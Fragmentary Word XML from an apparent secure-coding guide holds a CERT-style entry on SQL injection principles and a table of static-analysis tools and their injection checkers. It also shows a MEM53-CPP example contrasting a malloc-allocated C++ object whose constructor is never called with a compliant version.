              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D66564">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>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14D899A" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB1692F" w14:textId="0C2FC9D5" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(1) Validate Input Data- </w:t>
            </w:r>
            <w:r w:rsidR="0079083E">
              <w:t>In the compliant example, input data is validated to be either accepted or rejected based on acceptable character criteria. This is an excellent example of how to avoid SQL injection.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53482B8C" w14:textId="453687D7" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="00F51FA8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(7) Sanitize Data Sent to Other Systems-</w:t>
            </w:r>
            <w:r w:rsidR="0079083E">
              <w:t xml:space="preserve"> Because the developer is working with user data in a database, it is crucial to ensure that data sent to such a subsystem, and other complex subsystems, are sanitized.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C477BB1" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CDD9AA9" w14:textId="774B9F76" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C831C3D" w14:textId="397D20D4" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDF17A4" w14:textId="03024B7C" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="459AD35B" w14:textId="29F65277" w:rsidR="00B475A1" w:rsidRDefault="00AE25B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E02A5C1" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Astree</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510F5ED6" w14:textId="7928914A" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55B618EC" w14:textId="245AB673" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E70620" w14:textId="4EA7E0EA" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE25B5">
              <w:t>Supported by stubbing/taint analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="631335FB" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7DAF61" w14:textId="77BF1EDA" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Coverity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59BE0E81" w14:textId="15F1025C" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B3F44DA" w14:textId="17149849" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>TAINTED_STRING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75413ECD" w14:textId="49198A97" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fully implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="53A16CAB" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="730AD398" w14:textId="5E014849" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CodeSonar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01646044" w14:textId="60B81A5F" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CDAF81" w14:textId="5C521881" w:rsidR="00B475A1" w:rsidRPr="00AE25B5" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE25B5">
              <w:t>IO.INJ.COMMAND</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>IO.INJ.FMT</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>IO.INJ.LDAP</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>IO.INJ.LIB</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>IO.INJ.SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>IO.UT.LIB</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>IO.UT.PROC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D28E14" w14:textId="3D3ADC1D" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE25B5">
              <w:t>Command injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>Format string injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>LDAP injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>Library injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>SQL injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>Untrusted Library Load</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>Untrusted Process Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="3116DC25" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72D2ADAE" w14:textId="63DC063A" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175DCE5F" w14:textId="469EAEDF" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04C2C431" w14:textId="1FF60931" w:rsidR="00B475A1" w:rsidRPr="00AE25B5" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE25B5">
              <w:t>CERT_C-STR02-a</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>CERT_C-STR02-b</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>CERT_C-STR02-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EED4FB0" w14:textId="7CE645F2" w:rsidR="00B475A1" w:rsidRDefault="00AE25B5" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE25B5">
              <w:t>Protect against command injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:br/>
              <w:t>Protect against file name injection</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE25B5">
              <w:b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D452419" w:rsidR="00381847" w:rsidRDefault="00167423">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>MEM53-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0BFF7219" w14:textId="7D47319C" w:rsidR="00167423" w:rsidRPr="00167423" w:rsidRDefault="00167423" w:rsidP="00167423">
            <w:r w:rsidRPr="00167423">
              <w:t>Explicitly construct and destruct objects when manually managing object lifetime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76F8F206" w14:textId="2086B398"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BDF9864" w:rsidR="00F72634" w:rsidRDefault="00416161" w:rsidP="0015146B">
            <w:r>
              <w:t>A class with nontrivial initialization because of the presence of a user-provided constructor is created with std::malloc(). The constructor is never called which results in undefined behavior when the class is accessed by s-&gt;f().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="3267071A" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="397E86D6"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstdlib&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="460799CE"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA45A6A"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="382D6189"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4003941E"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64562A73"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Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A758AA"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000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27015843"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79A3C865"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>g() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4BC487"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S *s = </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>static_cast</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&lt;S *&gt;(std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>malloc</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>sizeof</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(S)));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BF3001"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A182B5"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>s-&gt;f();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50204C9E"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022834C6"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF1493"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>free</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(s);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C4D0934" w14:textId="5A4BD53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EDD5B2B" w:rsidR="00F72634" w:rsidRDefault="00416161" w:rsidP="0015146B">
            <w:r>
              <w:t>The constructor and destructor are explicitly called and the underlying storage is a separate variable from the live object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="7A1A78A0" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70BC85B2"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;cstdlib&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B61F0D5"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;new&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4760D5E6"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68FAAD12"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>struct</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73CE878B"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Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>S();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5532D0F0"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19866154"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Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00416161">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53509AB2"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000000"/>
                <w:sz w:val="21"/>
